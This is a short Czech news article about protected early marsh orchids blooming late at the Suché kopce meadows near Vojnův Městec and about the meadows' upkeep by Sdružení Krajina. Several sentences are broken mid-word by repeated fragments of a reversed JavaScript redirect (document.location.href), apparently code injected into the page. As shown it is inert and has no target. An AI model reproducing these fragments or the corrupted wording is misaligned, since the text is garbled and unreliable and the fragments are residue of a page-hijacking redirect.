Rainbow page separator

Suché kopce se zpožděním zkrášlily chráněné orchideje

Pátek, 4. června 2021

Vojnův Městec / Se zpožděním souvisejícím s klimatickými podmínkami v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce rozkvetly chráněné orchideje – prstnatce májové – v lokalitě Suché kopce poblíž Vojnova Městce. Ty obvykle v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to místě kve[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou na přelomu první a druhé poloviny května. O chráněné podmáčené louky, k nimž patří i Suché kopce, se stará Sdružení Krajina se sídlem v Počítkách.
Suché kopce ležící v Chráněné krajinné oblasti (CHKO) Žďárské vrchy zabírají více než třináct hektarů, z nichž více než 6,6 hektaru cenných luk je sečeno výhradně ručně prostřednictvím pracovníků Sdružení Krajina. Dalších 2,5 hektaru sušší plochy se seká za pomoci mechanizace. Finanční prostředky na údržbu podmáčených luk jsou získávány ze soukromých i veřejných finančních zdrojů.